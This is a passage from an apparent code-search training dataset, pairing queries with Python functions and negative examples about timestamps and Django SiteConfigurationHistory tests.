"def get_timestamp():\n\ttimestamp = datetime.datetime.now().strftime('%Y%m%d%H%M%S%f')\n\tsleep(10e-6) # This ensures that there will not exist two equal timestamps.\n\treturn timestamp",
"def current_timestamp():\n # return \"%d-%02d-%02dT%02d:%02d:%02dZ\" % utime.localtime()[:6]\n return utime.time()",
"def get_sensor_timestamp(self, sensorname):\n _, _, timestamp = self.get_sensor(sensorname)\n return timestamp",
"def setpoint_ts(self):\n return self._metadata[\"setpoint_timestamp\"]",
"def timestamp_sec(self):\n return _raw_util.raw_message_sptr_timestamp_sec(self)",
"def time(self):\n err=Ntptime.ntptime_shm_getlastts(self.cont, self.t)\n if (err!=0):\n raise Exception(\"can't get last ts, err - \" + str(err))\n\n return Ntptime.ntptime_to_u64(self.t)",
"def get_timestamp(use_timestamp):\n if not use_timestamp:\n return ''\n else:\n timestamp = datetime.now()\n timestamp = '_{}_{}_{}_{}_{}'.format(\n timestamp.month, timestamp.day, timestamp.hour,\n timestamp.minute, timestamp.second)\n return timestamp",
"def unix_timestamp(self):\n for cycle in self.cycles:\n return cycle.get('time')\n return None",
"def timestamp(self):\n def get_tstp(y, mo, d, h, mi, s):\n ts = time.strptime(str(y) + '-' + str(mo) + '-' + str(d) + 'T' + str(h) + ':' + \\\n str(mi) + ':' + str(s), '%Y-%m-%dT%H:%M:%S')\n return time.mktime(ts)\n y = 1970\n mo = 1\n d = 1\n h = 0\n mi = 0\n s = 0\n # syntacic hack - 'while' stmt is not important, but 'break' makes there goto stmt\n while 1:\n if self._content['year'] is None: break\n y = self._content['year']\n if self._content['month'] is None: break\n mo = self._content['month']\n if self._content['day'] is None: break\n d = self._content['day']\n if self._content['hour'] is None: break\n h = self._content['hour']\n if self._content['minute'] is None: break\n mi = self._content['minute']\n if self._content['second'] is None: break\n s = self._content['second']\n break\n if y < 1970: return 0.0\n return get_tstp(y, mo, d, h, mi, s)",
"def last_key_generation_timestamp(self) -> Optional[str]:\n return pulumi.get(self, \"last_key_generation_timestamp\")",
"def timestamp(self,item):\n try:\n self._timestamp[item]\n except:\n self._timestamp[item] = time.time()\n return self._timestamp[item]",
"def get_last_timestamp(self):\n if self.halo_module == \"scans\":\n url = \"/v1/scans?sort_by=created_at.desc&per_page=1\"\n elif self.halo_module == \"events\":\n url = \"/v1/events?sort_by=created_at.desc&per_page=1\"\n else:\n print(\"Unrecognized module: %s\" % self.halo_module)\n session = cloudpassage.HaloSession(self.halo_key,\n self.halo_secret,\n api_host=self.halo_api_hostname,\n integration_string=self.integration_name)\n http_helper = cloudpassage.HttpHelper(session)\n timestamp = http_helper.get(url)[self.halo_module][0][\"created_at\"]\n return timestamp",
"def bootstrapped_timestamp(self):\n\n return self._bootstrapped_timestamp.value",
"def getDateTime(self):\n\n return self.__timeStamp",
"def get_physical_time():\n return datetime.now().timestamp()"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test that an entry is added to the SiteConfigurationHistory model each time a new SiteConfiguration is added.
|
def test_site_configuration_post_save_receiver(self):
# add SiteConfiguration to database
site_configuration = SiteConfigurationFactory.create(
site=self.site,
)
# Verify an entry to SiteConfigurationHistory was added.
site_configuration_history = SiteConfigurationHistory.objects.filter(
site=site_configuration.site,
).all()
# Make sure an entry (and only one entry) is saved for SiteConfiguration
assert len(site_configuration_history) == 1
|
[
"def test_site_configuration_post_update_receiver(self):\n # add SiteConfiguration to database\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n site_configuration.site_values = {'test': 'test'}\n site_configuration.save()\n\n # Verify an entry to SiteConfigurationHistory was added.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure two entries (one for create and one for update) are saved for SiteConfiguration\n assert len(site_configuration_history) == 2",
"def test_no_entry_is_saved_for_errors(self):\n # add SiteConfiguration to database\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n # Verify an entry to SiteConfigurationHistory was added.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure entry is saved if there is no error\n assert len(site_configuration_history) == 1\n\n with transaction.atomic():\n with pytest.raises(IntegrityError):\n # try to add a duplicate entry\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure no entry is saved if there an error\n assert len(site_configuration_history) == 1",
"def test_site_configuration_post_update_receiver_with_skip(self):\n # Add SiteConfiguration to database. By default, the site_valutes field contains only \"{}\".\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n # Update the SiteConfiguration we just created.\n site_configuration.site_values = {\"test\": \"test\"}\n save_siteconfig_without_historical_record(site_configuration) # Instead of .save().\n\n # Verify that the SiteConfiguration has been updated.\n assert site_configuration.get_value('test') == 'test'\n\n # Verify an entry to SiteConfigurationHistory was NOT added.\n # Make sure one entry (one for create and NONE for update) is saved for SiteConfiguration.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n assert len(site_configuration_history) == 1",
"def added(self, configuration):",
"def test_update_history_using_put(self):\n pass",
"def testBacklogCreation(self):\n global_backlog = BacklogConfiguration(self.env, name=\"Global Backlog\")\n global_backlog.ticket_types = [Type.REQUIREMENT]\n global_backlog.save()\n # Now reload the same backlog and check that the type and order are kept\n b1 = self.bmm.get(name=\"Global Backlog\")\n self.assert_equals(b1.ticket_types, [Type.REQUIREMENT])",
"def test_site_configuration_has_changed(self):\n # The database configuration timestamp is initialized as part\n # of the default data. In that case, it happened during the\n # package_setup() for this test run.\n last_update = Configuration.site_configuration_last_update(self._db)\n\n def ts():\n return Timestamp.value(\n self._db, Configuration.SITE_CONFIGURATION_CHANGED,\n service_type=None, collection=None\n )\n timestamp_value = ts()\n eq_(timestamp_value, last_update)\n\n # Now let's call site_configuration_has_changed().\n #\n # Sending cooldown=0 ensures we can change the timestamp value\n # even though it changed less than one second ago.\n time_of_update = datetime.datetime.utcnow()\n site_configuration_has_changed(self._db, cooldown=0)\n\n # The Timestamp has changed in the database.\n assert ts() > timestamp_value\n\n # The locally-stored last update value has been updated.\n new_last_update_time = Configuration.site_configuration_last_update(\n self._db, timeout=0\n )\n assert new_last_update_time > last_update\n assert (new_last_update_time - time_of_update).total_seconds() < 1\n\n # Let's be sneaky and update the timestamp directly,\n # without calling site_configuration_has_changed(). This\n # simulates another process on a different machine calling\n # site_configuration_has_changed() -- they will know about the\n # change but we won't be informed.\n timestamp = Timestamp.stamp(\n self._db, Configuration.SITE_CONFIGURATION_CHANGED,\n service_type=None, collection=None\n )\n\n # Calling Configuration.check_for_site_configuration_update\n # with a timeout doesn't detect the change.\n eq_(new_last_update_time,\n Configuration.site_configuration_last_update(self._db, timeout=60)\n )\n\n # But the default behavior -- a timeout of zero -- forces\n # the method to go to the database and find the correct\n # answer.\n newer_update = Configuration.site_configuration_last_update(\n self._db\n )\n assert newer_update > last_update\n\n # The Timestamp that tracks the last configuration update has\n # a cooldown; the default cooldown is 1 second. This means the\n # last update time will only be set once per second, to avoid\n # spamming the Timestamp with updates.\n\n # It's been less than one second since we updated the timeout\n # (with the Timestamp.stamp call). If this call decided that\n # the cooldown had expired, it would try to update the\n # Timestamp, and the code would crash because we're passing in\n # None instead of a database connection.\n #\n # But it knows the cooldown has not expired, so nothing\n # happens.\n site_configuration_has_changed(None)\n\n # Verify that the Timestamp has not changed (how could it,\n # with no database connection to modify the Timestamp?)\n eq_(newer_update,\n Configuration.site_configuration_last_update(self._db))",
"def test_application_audit_creation():\n instance1 = ApplicationHistory(id=1, application_id=10, application_status=\"New\",\n form_url=\"https://testsample.com/api/form/6100fae7ba5ac0627e9eefe6/submission/6101131fc325d44c1d846c13\")\n assert instance1.id == 1\n assert instance1.form_url == \"https://testsample.com/api/form/6100fae7ba5ac0627e9eefe6/submission/6101131fc325d44c1d846c13\"",
"def test_history_get(self):\n # the NewsLink is created in setUpTestData\n with self.login(self.test_user):\n self.get_check_200(\n \"admin:organizer_newslink_history\",\n object_id=self.nl1_pk,\n )",
"def test_add_current_list_to_history():\r\n\r\n participants = initialise_participants_dictionary()\r\n add_current_list_to_history(participants)\r\n\r\n history = get_history_list(participants)\r\n\r\n assert len(history) == 1",
"def test_get_strategy_history(self):\n pass",
"def test_add_configuration(self):\n # create an instance of the API class\n api_instance = swagger_client.ConfigurationApi(\n swagger_client.ApiClient())\n\n cfg = SAMPLE_CFG\n\n # Start monitoring response time\n start = time.clock()\n # Add a new test configuration\n api_instance.add_configuration(cfg)\n request_time = time.clock() - start\n # End monitoring response time\n\n self.assertLessEqual(request_time,\n API_MAX_ALLOWED_RESPONSE_TIME,\n \"Request completed in {}ms\".format(request_time))",
"def test_create_history_using_post(self):\n pass",
"def test_config_put(self):\n pass",
"def test_add_business_activity(self):\n pass",
"def test_add(self):\n\n p = Person(first_name='John',\n last_name='Doe',\n email='john@doe.com',\n birth_date=datetime.now())\n p.save()\n logs = ModelChange.objects.filter(instance_pk=p.pk)\n self.assertTrue(logs.exists())\n self.assertEqual(logs.first().type, 'add')",
"def test_share_configuration_link_duplicate_element(self):\n\n luke = User(\n **{\n 'email': 'lake@skywalker.io',\n 'first_name': 'Luke',\n 'last_name': 'Skywalker'\n }\n )\n luke.set_password('NeverJoinYou')\n luke.verified = True\n luke.save()\n\n alloy_store = deepcopy(ALLOY_STORE)\n alloy_store['alloys']['parent']['compositions'].append(\n {\n 'symbol': 'C',\n 'weight': 12.02\n }\n )\n\n with self.client as client:\n test_login(client, luke.email, 'NeverJoinYou')\n resp = client.post(\n '/v1/sim/user/share/simulation/link',\n data=json.dumps(\n {\n 'configurations': CONFIGS,\n 'alloy_store': alloy_store,\n 'simulation_results': SIMULATION_RESULTS\n }\n ),\n content_type='application/json'\n )\n\n data = json.loads(resp.data.decode())\n self.assertEqual(resp.status_code, 400)\n self.assertEqual(data['status'], 'fail')\n self.assertEqual(\n data['message'], 'Alloy contains duplicate elements.'\n )",
"def test_game_event():\n\n event = events.get(1)\n game = games.get(1)\n\n event.games.append(game)\n\n assert game in event.games",
"def setUp(self):\n reversion.register(Site)\n with reversion.revision:\n site = Site.objects.create(name=\"site\", domain=\"www.site-rev-1.com\")\n with reversion.revision:\n site.domain = \"www.site-rev-2.com\"\n site.save()\n self.site = site"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test that an entry is added to SiteConfigurationHistory each time a SiteConfiguration is updated.
|
def test_site_configuration_post_update_receiver(self):
# add SiteConfiguration to database
site_configuration = SiteConfigurationFactory.create(
site=self.site,
)
site_configuration.site_values = {'test': 'test'}
site_configuration.save()
# Verify an entry to SiteConfigurationHistory was added.
site_configuration_history = SiteConfigurationHistory.objects.filter(
site=site_configuration.site,
).all()
# Make sure two entries (one for create and one for update) are saved for SiteConfiguration
assert len(site_configuration_history) == 2
|
[
"def test_site_configuration_post_save_receiver(self):\n # add SiteConfiguration to database\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n # Verify an entry to SiteConfigurationHistory was added.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure an entry (and only one entry) is saved for SiteConfiguration\n assert len(site_configuration_history) == 1",
"def test_site_configuration_post_update_receiver_with_skip(self):\n # Add SiteConfiguration to database. By default, the site_valutes field contains only \"{}\".\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n # Update the SiteConfiguration we just created.\n site_configuration.site_values = {\"test\": \"test\"}\n save_siteconfig_without_historical_record(site_configuration) # Instead of .save().\n\n # Verify that the SiteConfiguration has been updated.\n assert site_configuration.get_value('test') == 'test'\n\n # Verify an entry to SiteConfigurationHistory was NOT added.\n # Make sure one entry (one for create and NONE for update) is saved for SiteConfiguration.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n assert len(site_configuration_history) == 1",
"def test_site_configuration_has_changed(self):\n # The database configuration timestamp is initialized as part\n # of the default data. In that case, it happened during the\n # package_setup() for this test run.\n last_update = Configuration.site_configuration_last_update(self._db)\n\n def ts():\n return Timestamp.value(\n self._db, Configuration.SITE_CONFIGURATION_CHANGED,\n service_type=None, collection=None\n )\n timestamp_value = ts()\n eq_(timestamp_value, last_update)\n\n # Now let's call site_configuration_has_changed().\n #\n # Sending cooldown=0 ensures we can change the timestamp value\n # even though it changed less than one second ago.\n time_of_update = datetime.datetime.utcnow()\n site_configuration_has_changed(self._db, cooldown=0)\n\n # The Timestamp has changed in the database.\n assert ts() > timestamp_value\n\n # The locally-stored last update value has been updated.\n new_last_update_time = Configuration.site_configuration_last_update(\n self._db, timeout=0\n )\n assert new_last_update_time > last_update\n assert (new_last_update_time - time_of_update).total_seconds() < 1\n\n # Let's be sneaky and update the timestamp directly,\n # without calling site_configuration_has_changed(). This\n # simulates another process on a different machine calling\n # site_configuration_has_changed() -- they will know about the\n # change but we won't be informed.\n timestamp = Timestamp.stamp(\n self._db, Configuration.SITE_CONFIGURATION_CHANGED,\n service_type=None, collection=None\n )\n\n # Calling Configuration.check_for_site_configuration_update\n # with a timeout doesn't detect the change.\n eq_(new_last_update_time,\n Configuration.site_configuration_last_update(self._db, timeout=60)\n )\n\n # But the default behavior -- a timeout of zero -- forces\n # the method to go to the database and find the correct\n # answer.\n newer_update = Configuration.site_configuration_last_update(\n self._db\n )\n assert newer_update > last_update\n\n # The Timestamp that tracks the last configuration update has\n # a cooldown; the default cooldown is 1 second. This means the\n # last update time will only be set once per second, to avoid\n # spamming the Timestamp with updates.\n\n # It's been less than one second since we updated the timeout\n # (with the Timestamp.stamp call). If this call decided that\n # the cooldown had expired, it would try to update the\n # Timestamp, and the code would crash because we're passing in\n # None instead of a database connection.\n #\n # But it knows the cooldown has not expired, so nothing\n # happens.\n site_configuration_has_changed(None)\n\n # Verify that the Timestamp has not changed (how could it,\n # with no database connection to modify the Timestamp?)\n eq_(newer_update,\n Configuration.site_configuration_last_update(self._db))",
"def test_no_entry_is_saved_for_errors(self):\n # add SiteConfiguration to database\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n # Verify an entry to SiteConfigurationHistory was added.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure entry is saved if there is no error\n assert len(site_configuration_history) == 1\n\n with transaction.atomic():\n with pytest.raises(IntegrityError):\n # try to add a duplicate entry\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure no entry is saved if there an error\n assert len(site_configuration_history) == 1",
"def test_update_history_using_put(self):\n pass",
"def updated(self, newConfiguration):",
"def test_write_record_update(self):\n # Assert task's config is not expected\n task = TaskRepository.fetch_task_by_id(self.url_task.id)\n self.assertNotEquals(task.config, {'url': 'hey'})\n\n # Update tasks's config\n task.config = {'url': 'hey'}\n TaskRepository.write_record(task)\n\n # Assert tasks' config is as expected\n task = TaskRepository.fetch_task_by_id(self.url_task.id)\n self.assertEquals(task.config, {'url': 'hey'})",
"def test_config_hash_change_do_trigger(self):\n configs = \\\n self.saasherder.get_saas_targets_config(self.saas_file)\n\n desired_tc = list(configs.values())[1]\n desired_promo_data = desired_tc[\"promotion\"][\"promotion_data\"]\n desired_promo_data[0][\"data\"][TARGET_CONFIG_HASH] = \"Changed\"\n\n job_specs = \\\n self.saasherder.get_configs_diff_saas_file(self.saas_file)\n self.assertEqual(len(job_specs), 1)",
"def view_config_changes():",
"def test_config_hash_change_do_trigger(self):\n configs = self.saasherder.get_saas_targets_config_trigger_specs(self.saas_file)\n\n desired_tc = list(configs.values())[1].state_content\n desired_promo_data = desired_tc[\"promotion\"][\"promotion_data\"]\n desired_promo_data[0][\"data\"][0][TARGET_CONFIG_HASH] = \"Changed\"\n\n trigger_specs = self.saasherder.get_configs_diff_saas_file(self.saas_file)\n self.assertEqual(len(trigger_specs), 1)",
"def test_config_put(self):\n pass",
"def configuration_changed(self, config_changes):\n # TODO: implement",
"def added(self, configuration):",
"def test_update(self):\n # this is really tested graphically, no unit test here\n pass",
"def test_update_configuration(self):\n # create an instance of the API class\n api_instance = swagger_client.ConfigurationApi(\n swagger_client.ApiClient())\n cfg = SAMPLE_CFG\n\n # Start monitoring response time\n start = time.clock()\n\n # Add a new test configuration (to be modified later)\n api_response = api_instance.add_configuration(cfg)\n # End monitoring response time\n request_time = time.clock() - start\n\n self.assertLessEqual(request_time,\n API_MAX_ALLOWED_RESPONSE_TIME,\n \"Request completed in {}ms\".format(request_time))\n\n # Modifies some values of existing configuration\n # to create an updated configuration\n updated_configuration = api_response\n updated_configuration.name = \"UpdatedName\"\n updated_configuration.value = {\"answer\": 42}\n\n # Start monitoring response time\n start = time.clock()\n # UPDATES THE ADDED CONFIGURATION (main purpose of the test)\n api_instance.update_configuration(updated_configuration)\n # End monitoring response time\n request_time = time.clock() - start\n\n self.assertLessEqual(request_time,\n API_MAX_ALLOWED_RESPONSE_TIME,\n \"Request completed in {}ms\".format(request_time))",
"def register_for_changed_log_entries(self):\n pass",
"def test_update_time_tracking_entry(self):\n pass",
"def view_config_changes(self):\n pass",
"def testUpdateSettings(self):\n user = profile_utils.seedNDBUser()\n profile_utils.loginNDB(user, is_admin=True)\n\n postdata = {\n 'description': TEST_DESCRIPTION,\n 'active_program': self.site.active_program.key()\n }\n response = self.post('/site/edit', postdata=postdata)\n self.assertResponseRedirect(response, url='/site/edit')\n\n site = site_model.Site.get_by_key_name('site')\n self.assertEqual(site.description, TEST_DESCRIPTION)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test that an entry is NOT added to SiteConfigurationHistory when a SiteConfiguration is updated with save_siteconfig_without_historical_record().
|
def test_site_configuration_post_update_receiver_with_skip(self):
# Add SiteConfiguration to database. By default, the site_values field contains only "{}".
site_configuration = SiteConfigurationFactory.create(
site=self.site,
)
# Update the SiteConfiguration we just created.
site_configuration.site_values = {"test": "test"}
save_siteconfig_without_historical_record(site_configuration) # Instead of .save().
# Verify that the SiteConfiguration has been updated.
assert site_configuration.get_value('test') == 'test'
# Verify an entry to SiteConfigurationHistory was NOT added.
# Make sure one entry (one for create and NONE for update) is saved for SiteConfiguration.
site_configuration_history = SiteConfigurationHistory.objects.filter(
site=site_configuration.site,
).all()
assert len(site_configuration_history) == 1
|
[
"def test_site_configuration_post_save_receiver(self):\n # add SiteConfiguration to database\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n # Verify an entry to SiteConfigurationHistory was added.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure an entry (and only one entry) is saved for SiteConfiguration\n assert len(site_configuration_history) == 1",
"def test_no_entry_is_saved_for_errors(self):\n # add SiteConfiguration to database\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n # Verify an entry to SiteConfigurationHistory was added.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure entry is saved if there is no error\n assert len(site_configuration_history) == 1\n\n with transaction.atomic():\n with pytest.raises(IntegrityError):\n # try to add a duplicate entry\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure no entry is saved if there an error\n assert len(site_configuration_history) == 1",
"def test_site_configuration_post_update_receiver(self):\n # add SiteConfiguration to database\n site_configuration = SiteConfigurationFactory.create(\n site=self.site,\n )\n\n site_configuration.site_values = {'test': 'test'}\n site_configuration.save()\n\n # Verify an entry to SiteConfigurationHistory was added.\n site_configuration_history = SiteConfigurationHistory.objects.filter(\n site=site_configuration.site,\n ).all()\n\n # Make sure two entries (one for create and one for update) are saved for SiteConfiguration\n assert len(site_configuration_history) == 2",
"def test_site_configuration_has_changed(self):\n # The database configuration timestamp is initialized as part\n # of the default data. In that case, it happened during the\n # package_setup() for this test run.\n last_update = Configuration.site_configuration_last_update(self._db)\n\n def ts():\n return Timestamp.value(\n self._db, Configuration.SITE_CONFIGURATION_CHANGED,\n service_type=None, collection=None\n )\n timestamp_value = ts()\n eq_(timestamp_value, last_update)\n\n # Now let's call site_configuration_has_changed().\n #\n # Sending cooldown=0 ensures we can change the timestamp value\n # even though it changed less than one second ago.\n time_of_update = datetime.datetime.utcnow()\n site_configuration_has_changed(self._db, cooldown=0)\n\n # The Timestamp has changed in the database.\n assert ts() > timestamp_value\n\n # The locally-stored last update value has been updated.\n new_last_update_time = Configuration.site_configuration_last_update(\n self._db, timeout=0\n )\n assert new_last_update_time > last_update\n assert (new_last_update_time - time_of_update).total_seconds() < 1\n\n # Let's be sneaky and update the timestamp directly,\n # without calling site_configuration_has_changed(). This\n # simulates another process on a different machine calling\n # site_configuration_has_changed() -- they will know about the\n # change but we won't be informed.\n timestamp = Timestamp.stamp(\n self._db, Configuration.SITE_CONFIGURATION_CHANGED,\n service_type=None, collection=None\n )\n\n # Calling Configuration.check_for_site_configuration_update\n # with a timeout doesn't detect the change.\n eq_(new_last_update_time,\n Configuration.site_configuration_last_update(self._db, timeout=60)\n )\n\n # But the default behavior -- a timeout of zero -- forces\n # the method to go to the database and find the correct\n # answer.\n newer_update = Configuration.site_configuration_last_update(\n self._db\n )\n assert newer_update > last_update\n\n # The Timestamp that tracks the last configuration update has\n # a cooldown; the default cooldown is 1 second. This means the\n # last update time will only be set once per second, to avoid\n # spamming the Timestamp with updates.\n\n # It's been less than one second since we updated the timeout\n # (with the Timestamp.stamp call). If this call decided that\n # the cooldown had expired, it would try to update the\n # Timestamp, and the code would crash because we're passing in\n # None instead of a database connection.\n #\n # But it knows the cooldown has not expired, so nothing\n # happens.\n site_configuration_has_changed(None)\n\n # Verify that the Timestamp has not changed (how could it,\n # with no database connection to modify the Timestamp?)\n eq_(newer_update,\n Configuration.site_configuration_last_update(self._db))",
"def test_set_last_timestamp_same(self, save_mock):\n self._config.last_timestamp = 1234567890\n save_mock.assert_not_called()",
"def testBacklogWithItemNotAdded(self):\n backlog = BacklogConfiguration(self.env, name=\"Global Backlog\")\n backlog.ticket_types=[Type.REQUIREMENT]\n backlog.save()\n # Create some tickets and add them to the Backlog\n b = self.bmm.get(name=\"Global Backlog\")\n t1 = self.teh.create_ticket(Type.REQUIREMENT, props={Key.BUSINESS_VALUE: '3000'})\n t_no = self.teh.create_ticket(Type.USER_STORY, props={Key.STORY_POINTS: '13'})\n t2 = self.teh.create_ticket(Type.REQUIREMENT, props={Key.BUSINESS_VALUE: '1200'})\n b1 = self.bmm.get(name=\"Global Backlog\")\n # Test that a belonging ticket is really belonging\n self.assert_contains(t2, b1)\n # Test if the external ticket, has been loaded into the Backlog\n self.assert_contains(t1, b1)\n # Test that the t_no, User Story is also not in the Backlog\n self.assert_not_contains(t_no, b1)",
"def test_same_configs_do_not_trigger(self):\n job_specs = \\\n self.saasherder.get_configs_diff_saas_file(self.saas_file)\n self.assertListEqual(job_specs, [])",
"def test_write_record_update(self):\n # Assert task's config is not expected\n task = TaskRepository.fetch_task_by_id(self.url_task.id)\n self.assertNotEquals(task.config, {'url': 'hey'})\n\n # Update tasks's config\n task.config = {'url': 'hey'}\n TaskRepository.write_record(task)\n\n # Assert tasks' config is as expected\n task = TaskRepository.fetch_task_by_id(self.url_task.id)\n self.assertEquals(task.config, {'url': 'hey'})",
"def test_update_not_existing_configuration(self):\n # create an instance of the API class\n api_instance = swagger_client.ConfigurationApi(\n swagger_client.ApiClient())\n cfg = SAMPLE_CFG\n\n # Start monitoring response time\n start = time.clock()\n\n # Add a new test configuration (to be modified later)\n api_response = api_instance.add_configuration(cfg)\n # End monitoring response time\n request_time = time.clock() - start\n\n self.assertLessEqual(request_time,\n API_MAX_ALLOWED_RESPONSE_TIME,\n \"Request completed in {}ms\".format(request_time))\n\n # Modifies some values of existing configuration\n # to create an updated invalid configuration\n updated_configuration = api_response\n updated_configuration.id = str(uuid.uuid4())\n updated_configuration.value = {\"answer\": 42}\n\n # Start monitoring response time\n start = time.clock()\n\n try:\n # UPDATES THE ADDED CONFIGURATION (main purpose of the test)\n api_instance.update_configuration(updated_configuration)\n except swagger_client.rest.ApiException as excp:\n if excp.status != 404:\n raise excp\n else:\n # End monitoring response time\n request_time = time.clock() - start\n\n self.assertLessEqual(\n request_time,\n API_MAX_ALLOWED_RESPONSE_TIME,\n \"Request completed in {}ms\".format(request_time))\n\n # Check if the error returned is the one expected\n self.assertEqual(excp.status, 404)\n return\n\n raise Exception(\"Configuration should not be updated\")",
"def test_update_history_using_put(self):\n pass",
"def test_metadata_excludes_set_once():\n\n conf = Config()\n conf._metadata_exclusions.append(\"foo\")\n conf._metadata_exclusions.append(\"foo\")\n conf._metadata_exclusions.append(\"foo\")\n conf._metadata_exclusions.append(\"bar\")\n conf._metadata_exclusions.append(\"foo\")\n conf._metadata_exclusions.append(\"bar\")\n assert conf._metadata_exclusions == [\"foo\", \"bar\"]",
"def test_suppress_state_save_no_change(self, save_mock):\n # Try to mark with success more than once\n self._config.mark_running()\n self._config.mark_running()\n\n save_mock.assert_called_once()",
"def unset(key):\n if key in memo:\n del memo[key]\n (db\n .session\n .query(SiteConfiguration)\n .filter(key == key)\n .delete())\n db.session.commit()",
"def testBacklogCreation(self):\n global_backlog = BacklogConfiguration(self.env, name=\"Global Backlog\")\n global_backlog.ticket_types = [Type.REQUIREMENT]\n global_backlog.save()\n # Now reload the same backlog and check that the type and order are kept\n b1 = self.bmm.get(name=\"Global Backlog\")\n self.assert_equals(b1.ticket_types, [Type.REQUIREMENT])",
"def test_equal_false(self):\n config1 = Config({'foo': {'bar': 'baz'}})\n config2 = Config({'foo': {'bar': 'bza'}})\n self.assertFalse(config1 == config2)",
"def test_catchall(self):\n # Nullify all datestatuschanged so the public add-ons hit the\n # catch-all.\n (File.objects.filter(status=amo.STATUS_PUBLIC)\n .update(datestatuschanged=None))\n Addon.objects.update(last_updated=None)\n\n cron.addon_last_updated()\n for addon in Addon.objects.filter(status=amo.STATUS_PUBLIC):\n eq_(addon.last_updated, addon.created)\n\n # Make sure it's stable.\n cron.addon_last_updated()\n for addon in Addon.objects.filter(status=amo.STATUS_PUBLIC):\n eq_(addon.last_updated, addon.created)",
"def testGlobalBacklogWithStrictOption(self):\n backlog = BacklogConfiguration(self.env, name=\"Bug-Backlog\")\n backlog.ticket_types=[Type.BUG, Type.TASK]\n backlog.save()\n # Build a hierarchy of Bug tasks\n b1 = self.teh.create_ticket(Type.BUG)\n t1 = self.teh.create_ticket(Type.TASK, \n props={Key.REMAINING_TIME: '3'})\n t2 = self.teh.create_ticket(Type.TASK, \n props={Key.REMAINING_TIME: '7'})\n # Link the Bug only with one task\n self.assert_true(b1.link_to(t1))\n self.assert_equals('', b1[Key.SPRINT])\n # Standard trac fields must not be None (see property change rendering\n # for ticket preview)\n self.assert_equals('', b1[Key.MILESTONE])\n self.assert_equals(Type.BUG, b1[Key.TYPE])\n self.assert_equals('', t1[Key.SPRINT])\n self.assert_equals('', t1[Key.MILESTONE])\n self.assert_equals('', t2[Key.SPRINT])\n self.assert_equals('', t2[Key.MILESTONE])\n \n # Now load the backlog, and check that even with strict\n # a global backlog shows all the tickets\n b = self.bmm.get(name=\"Bug-Backlog\")\n if len(b) != 3:\n print_backlog(b)\n self.fail(\"Backlog count wrong! %s != 3\" % \\\n len(b))\n # Now links also the second task\n self.assert_true(b1.link_to(t2))\n # Now reload the backlog and check if the second task is there too\n self.assert_length(3, b)\n # Now plan the a task for a sprint so that should disappear from the\n # backlog\n s = self.teh.create_sprint(\"Test\")\n t1[Key.SPRINT] = s.name\n self.assert_true(t1.save_changes('Tester', 'Planned...'))\n self.assert_length(2, b)",
"async def test_unload_config_entry(hass: HomeAssistant, entry, lcn_connection) -> None:\n await hass.config_entries.async_unload(entry.entry_id)\n assert hass.states.get(SENSOR_VAR1).state == STATE_UNAVAILABLE\n assert hass.states.get(SENSOR_SETPOINT1).state == STATE_UNAVAILABLE\n assert hass.states.get(SENSOR_LED6).state == STATE_UNAVAILABLE\n assert hass.states.get(SENSOR_LOGICOP1).state == STATE_UNAVAILABLE",
"def test_get_history_no_update(self):\n self.user_access()\n self.posting_article(post_article)\n slug = self.article_slug()\n url = reverse(\"comments:post_comment\", kwargs={'slug': slug})\n res = self.client.post(url, data=comment, format=\"json\")\n data = res.data\n comment_id = data[\"comment\"][\"id\"]\n fetch_url = reverse(\"comments:comment_history\", kwargs={'pk':comment_id})\n response = self.client.get(fetch_url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertIn(comment[\"body\"], \n response.data[\"history\"][0][\"comment_body\"])"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test that an entry is not added to SiteConfigurationHistory if there is an error while saving SiteConfiguration.
|
def test_no_entry_is_saved_for_errors(self):
# add SiteConfiguration to database
site_configuration = SiteConfigurationFactory.create(
site=self.site,
)
# Verify an entry to SiteConfigurationHistory was added.
site_configuration_history = SiteConfigurationHistory.objects.filter(
site=site_configuration.site,
).all()
# Make sure an entry is saved if there is no error
assert len(site_configuration_history) == 1
with transaction.atomic():
with pytest.raises(IntegrityError):
# try to add a duplicate entry
site_configuration = SiteConfigurationFactory.create(
site=self.site,
)
site_configuration_history = SiteConfigurationHistory.objects.filter(
site=site_configuration.site,
).all()
# Make sure no entry is saved if there is an error
assert len(site_configuration_history) == 1
|
[
